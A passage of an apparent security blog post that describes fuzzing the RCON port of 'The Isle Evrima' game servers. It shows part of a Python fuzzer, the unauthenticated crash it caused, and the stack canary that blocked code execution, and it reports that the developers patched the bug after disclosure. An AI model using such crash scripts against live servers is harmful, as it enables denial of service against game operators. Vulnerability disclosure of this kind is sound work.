        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
          s.settimeout(timeout)
          s.connect((ip, port))
          string = string.encode()
          payload = bytes('\x01', 'utf-8') + string + bytes('\x00', 'utf-8')
          print("Fuzzing with {} bytes".format(len(payload)))
          s.send((payload))
          message = s.recv(1024)
          print(message)
      except:
        print("Fuzzing crashed at {} bytes".format(len(payload)))
        sys.exit(0)
      time.sleep(2)

Windows Access Exception

Access Violation Windows

So the server crashed, and we got an access violation. Well of course we did! Considering the address we attempted to access was well past the stack. We can also see a debug string “Error receiving data from the TCP socket”. The thread is the FTcpListener. So it’s safe to assume the overflow occurred within TCP connection handler. The password buffer seems to have a 1000 byte limit, so I don’t think it actually occurs there, but once the buffer is received. I have a dedicated server running on a Linux box, so I decided to test it remotely, yup it works. So its safe to assume that any server with an accessible RCON port with RCON enabled will be vulnerable to this attack.

**This includes every one of the official servers. Meaning someone could shut them down indefinitely with a short python script until the devlopers patch it or disable RCON on the official servers**. RCON is a plain text protocol, so I hope the developers are not actually accessing it outside of the local network for official servers.

**A Buffer Overrun Exception**

Now sending 200,000 bytes is a bit overkill. What happens when we send just enough? Well it turns out just enough is about 2047 bytes within the buffer(on windows), and it will render us with a “STATUS\_BUFFER\_OVERRUN”, which is actually a good thing,

The Stack Canary protects from remote code execution.

STATUS\_STACK\_BUFFER\_OVERRUN

Linux Segmentation Fault

**Corruption Canary saves us, for now**

Now a buffer overrun might sound scary, but really, its a good thing. You see that string there” Corruption Canary was …” That means there is a stack Canary, a address responsible for detecting overflows and terminating a process. That means an attacker can still crash your server with no authentication, BUT, they will face an additional hurdle when attempting to execute shell code. That does not mean its impossible. Given some time, a skilled reverse engineer could bypass the stack canary and own any server running RCON. (Including the official servers). This is a scary thought.

**Reporting to the Developers**

So I’m sitting on a bug and an exploit that allows me to crash any official server at any time, along with many unofficial servers. And its a matter of time before someone malicious finds this. It’s time to report. There were many ways to publicly report a bug, but nowhere privately for a vulnerability. I used the bug report form to tell the devs to message me over discord, posted on the bug section for someone to message me, and sent an email to the support team letting them know that I had found a buffer overflow on the isle evrima. I’ve gotten a response, and as of 8/12/2022 the buffer overflow has been patched.

On a side note, if you would like to set up your own server, I’ve made a tutorial here for Linux via Linode : Create a Dedicated The Isle Evrima Server on Ubuntu 22.04 Linux – TakeTheBait

And if you are facing issues your your personal server, I’ve made a post detailing most of the common issues and resolutions:

Troubleshooting the Isle Dedicated Server Issues – TakeTheBait

Tag

#buffer_overflow